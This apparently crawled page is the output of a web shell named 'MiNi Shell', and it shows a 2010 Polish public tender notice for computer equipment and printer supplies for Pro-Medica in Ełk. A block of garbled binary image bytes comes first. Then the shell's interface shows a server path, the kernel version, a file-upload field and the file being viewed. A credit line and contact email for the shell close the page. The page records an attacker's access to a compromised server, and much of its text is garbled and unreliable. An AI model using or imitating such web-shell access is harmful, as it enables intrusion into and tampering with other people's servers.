JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/239625-N-2010.html

<p class="kh_header"><b>Ełk: Przetarg nieograniczony o wartości poniżej 193 000 Euro na  dostawę sprzętu komputerowego oraz materiałów eksploatacyjnych dla Pro-Medica w Ełku Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 239625 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Pro-Medica" w Ełku Sp. z o.o. , ul. Baranki 24, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 621 96 50, faks 087 621 96 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.promedica.elk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Pro-Medica w Ełku Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony o wartości poniżej 193 000 Euro na  dostawę sprzętu komputerowego oraz materiałów eksploatacyjnych dla Pro-Medica w Ełku Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego sprzętu komputerowego i materiałów eksploatacyjnych  w asortymencie i ilościach określonych w załączniku nr 1 - Formularz cenowy. Przedmiot zamówienia obejmuje 7 pakietów.
Zamawiający wymaga w pakiecie nr  5 i 6 materiałów eksploatacyjnych oryginalnych tj. wyprodukowane przez producenta urządzenia lub równoważne oryginalnym. Przez równoważność należy rozumieć: funkcjonalność, jakość wydruku (kopii), wydajność, szybkość schnięcia (utrwalenia), nie zamazywanie się druku (kopii) - odpowiadające wyrobom producenta urządzenia. Oferowane równoważne materiały eksploatacyjne muszą spełniać warunek bezkonfliktowej pracy z danym urządzeniem, w stopniu nie mniejszym niż wskazany z symbolu oryginał, a w szczególności dotyczy to wydajności, która nie może być mniejsza niż w materiałach oryginalnych. 
   Zamawiający wymaga aby materiały eksploatacyjne były fabrycznie nowe, nie noszące śladów uszkodzeń zewnętrznych oraz uprzedniego używania lub zabrudzeń. Za fabrycznie nowy nie uznaje się wyrobu, gdzie pojemnik został jedynie wyczyszczony i ponownie napełniony (regenerowany). 
Lp.	Przedmiot zamówienia	JM	ILOŚĆ		
Pakiet 1 Materiały do RISO  					
1	FARBA RISO ORYG. CZARNA CR INK G1 800mlSZT6					
2	FARBA RISO ORYG. CZARNA RZ INK G1 1000mlSZT10					
3	FARBA RISO ORYG. NIEBIESKA RZ MEDIUM BLUE S-4261E SZT 4					
4	FARBA RISO ORYG. ZIELONA RZ S 4259	SZT	2					
5	MATRYCA TR CR-A4 RISO CRA4L	SZT	2					
6	MATRYCA Z37 A3 DO RZ370EP	SZT	4				

Pakiet 2 Płyny CPV 30237250-6								
1	PIANKA DO SZKŁA Spray 400 ml	SZT	2					
2	PIANKA DO PLASTIKU Spray 400 ml	SZT	8					
3	PIANKA DO MONITORÓW LCD Spray 400 ml	SZT	8					
4	DYSKIETKA Czyszcząca 3,5:	SZT	1					
	
Pakiet 3 Nośniki 30234000-6						
1	CD R do ARCHIWIZACJI + koperta z okienkiem	SZT	600
2	DVD +R  ARCHIWIZACJA + koperta z okienkiem	SZT	200
3	DVD -R  ARCHIWIZACJA + koperta z okienkiem	SZT	600
4	CD R - zwykły + koperta z okienkiem	SZT	1500
			
	dla poz 1,2,3 gwarancja zapisu min 20 lat przy warunkach przechowywania 15-25 C i wilgotności 20-40% - potwierdzone certyfikatem						
			
Pakiet 4 Osprzęt komputerowy CPV 30231300-0							
1	KABEL PATCH CORD 0.5M	SZT	40					
2	KABEL PATCH CORD 2M	SZT	20					
3	KABEL PATCH CORD 3M	SZT	15					
4	MYSZKA OPTYCZNA 1	SZT	30					
5	KLAWIATURA KOMPUTEROWA PS 2  USB 2	SZT	30					
6	KLAWIATURA KOMPUTEROWA Z CZYTNIKIEM kart chipowych USB 2	SZT	40					
7	LISTWA PRZEPIĘCIOWA ACAR 5	SZT	5					
8	MONITOR 19 LCD 3	SZT	15					
9	MONITOR 21 LCD lub większy 4	SZT	15					
								
1	przewodowa; z pokrętłem, PS 2-USB , ilość przycisków 3 , 				gwarancja min. 2 lata			
2	 złącze PS 2 lub USB w zależności od zamówienia ; liczba klawiszy 104, układ klawiszy : standard				gwarancja min.  2 lata			
3	rozdzielczość natywna : 	 1440X900						
	proporcje obrazu	16:10						
	kontrast  większe lub równe	1000:1  dynamiczny 8000:1						
	jasność  większa lub rowna300			cd m2			
	plamka mniejsza lub równa0,285			mm			
	czas reakcji matrycy mniejszy lub równy	6 (szary szary)			ms			
	wejścia	D-SUB + DVI						
	normy : 	TCO 05						
	zużycie energii w trybie standardowym <=	25W						
	gwarancja  minimum	3lata			
	Uwagi 	Matryca z podświetleniem LED						
4	rozdzielczość natywna : 	1680X1050						
	proporcje obrazu	16:10						
	kontrast  >=	1000:1						
	jasność  >=	250			cd m2			
	plamka <=	0,280			mm			
	czas reakcji matrycy <=	6 (szary szary)	ms			
	wejścia	D-SUB + DVI						
	normy : 	TCO 03						
	zużycie energii w trybie standardowym <=	55W						
	gwarancja  minimum	3			lata			
	Uwagi 							
			
Pakiet 5  Taśmy CPV 30192320-0								
1	ATRAMENT HP W Litrach	L	1					
3	GŁOWICA HP 56 CZARNA ZASTEPCZA	SZT	2					
4	GŁOWICA HP 15 CZARNA	SZT	3					
5	GŁOWICA PHILIPS PFA-431	SZT	1					
6	GLOWICA HP 339 21ML CZARNA C8767AE	SZT	1					
7	GŁOWICA HP 21	SZT	6					
8	GŁOWICA HP 703 CZARNA	SZT	6					
9	GŁOWICA HP 703 KOLOR	SZT	1					
10	TASMA OKI 520	SZT	2					
11	TASMA OKI 320	SZT	20					
12	TASMA FUJITSU DL2400 SZT	4					

Pakiet 6 Cartridge CPV 30125110-5							
1	CARTRIDGE SAMSUNG ML-1710D3 3000str	SZT	1					
2	CARTRIDGE SAMSUNG SCX 4521D3 3000strSZT	6					
3	CARTRIDGE HP 1010 Q2612A 2000str	SZT	6					
4	CARTRIDGE OKI LP C5650 5750 BLACK	SZT	1					
5	CARTRIDGE OKI LP C5650 5750 CYAN	SZT	1					
6	CARTRIDGE OKI LP C5650 5750 MAGENTA	SZT	1					
7	CARTRIDGE OKI LP C5650 5750 YELLOW	SZT	1					
8	BĘBEN DO OKI C5650 MAGENTA 43870006	SZT	1					
9	BĘBEN DO OKI C5650 CYAN 43870007	SZT	1					
10	BĘBEN DO OKI C5650 YELLOW 43870005	SZT	1					
11	BĘBEN DO OKI C5650 BLACK 43870008	SZT	1					
12	CARTRIDGE HP 2100 2200  C4096A 5000str	SZT	36					
13	CARTRIDGE HP 1300 Q2613X 4000str	SZT	1					
14	CARTRIDGE HP 5 - 92298X 8800str	SZT	1					
15	CARTRIDGE HP 1320 Q5949X 6000str	SZT	1					
16	CARTRIDGE HP 3800 BLACK Q6470A 6000str	SZT	3					
17	CARTRIDGE HP 3800 CYAN Q7581A 6000str	SZT	2					
18	CARTRIDGE HP 3800 YELLOW Q7582A 6000str	SZT	2					
19	CARTRIDGE HP 3800 MAGENTA Q7583A 6000str	SZT	4					
20	CARTRIDGE HP 1000 1200  (C7115A) 2500str	SZT	1					
21	CARTRIDGE HP 5SI C3909A 8000str	SZT	1					
22	CARTRIDGE HP 4100 C8061X 10000str	SZT	9					
23	CARTRIDGE HP 1100 C4092A Canon EP22 LBP-1120 C4092 2500str	SZT	4					
24	CARTRIDGE MINOLTA PP 1300W 1710567 6000strSZT	1					
25	TONER MINOLTA EP 1050  220g	SZT	3					
26	TONER-TOSHIBA DP 3580 300g	SZT	6					
27	TONER-TOSHIBA T-2060 2860 300g	SZT	2					
28	TONER NASHUATEC 3545 4545 550g	SZT	3					
29	CARTRIDGE HP 1005-1006 CB435A	SZT	1					
30	CARTRIDGE HP Q7553X	SZT	1					
31	CARTRIDGE HP 9040n C8543X	SZT	2					
32	CARTRIDGE HP CLJ1600 BLACK Q6000A 2500strSZT	2					
33	CARTRIDGE HP CLJ1600  CYAN Q6001A 2000str	SZT	2					
34	CARTRIDGE HP CLJ1600  MAGENTA Q6002A 2000str		2					
35	CARTRIDGE HP CLJ1600  YELLOW Q6003A 2000str		2					
36	Toner NASHUATEC DSM622 RICOH 2022	SZT	8					
					
Pakiet 7 komputery CPV 30213000-5							
1	KOMPUTER	SZT	30					
	Wymagania minimalne Procesor klasy Core 2 Duo  1,86 GHz (lub analogiczny), pamięć DDR2 1024 MB533MHz, możliwość rozbudowy do 4GB , dysk 80GB SATA , DVD ROM (lub COMBO), karta sieciowa 10 100 1000 zintegrowana, karta dźwiękowa zintegrowana, grafika z min 128MB RAM, wyjście DVI i DSUB Złącza zewnętrzne : 7 x USB 2.0, wejście mikrofonowe , wyjście głośnikowe, RS 232 - COM (9 pin),  port drukarkowy LPT;  Złącza wewnętrzne : 1x PCI, 1x PCI-Ex, 2 banki pamięci,  System operacyjny Windows XP Professional lub nowszy (dla Visty tylko wersja Business) w wersji PL Gwarancja min. 6 m-cy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.23.72.50-6, 30.23.40.00-6, 30.23.13.00-0, 30.19.23.20-0, 30.12.51.10-5, 30.21.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium w kwocie  
	Pakiet 1  - 90  zł słownie: dziewięćdziesiąt złotych 
	Pakiet 2  -  5 zł słownie pięć złotych 
	Pakiet 3 - 60 zł słownie: sześćdziesiąt złotych 
	Pakiet 4 - 500 zł słownie: pięćset złotych 
	Pakiet 5 -    30 zł słownie: trzydzieści złotych 
	Pakiet 6 - 500 zł słownie: pięćset złotych
	Pakiet 7 - 450 zł słownie: czterysta pięćdziesiąt złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania lub wykonuje nadal przynajmniej dwa zamówienia odpowiadające rodzajem i wartością dostawom stanowiącym przedmiot niniejszego zamówienia.   Potwierdzeniem spełniania tego warunku jest załączenie do ofert dokumentów, o których mowa w Rozdziale V pkt.1 SIWZ
Opis sposobu dokonywania oceny spełniania tego warunku: Ocena zostanie dokonana według formuły: spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wprowadza szczególnych warunków w tym zakresie. ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Katalog lub kopie tych stron katalogu lub inne materiały firmowe, na których będą zawarte wyczerpujące informacje dotyczące oferowanego sprzętu potwierdzające zgodność parametrów wymaganych przez Zamawiającego względem oferowanego sprzętu - dotyczy pakiet 4 poz. 8 i 9.
2.Certyfikat gwarantujący trwałość zapisu min 20 lat przy warunkach przechowywania 15 - 25 C i wilgotności 20-40 % - dotyczy Pakietu 3 pozycje 1,2,3</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie, w którym Wykonawca potwierdza, że jest związany ofertą przez okres 30 dni od dnia, w którym upływa termin składania ofert.
2) Uzupełniony formularz cenowy oferty (załącznik nr 1 do SIWZ)
3) Potwierdzenie dokonania wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.promedica.elk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pro-Medica w Ełku Sp. z o.o. 
ul. Baranki 24; 19-300 Ełk
Pok 027 A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2010 godzina 10:30, miejsce: Pro-Medica w Ełku Sp. z o.o.; 
ul. Baranki 24; 19-300 Ełk ;Sekretariat pok. 504.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com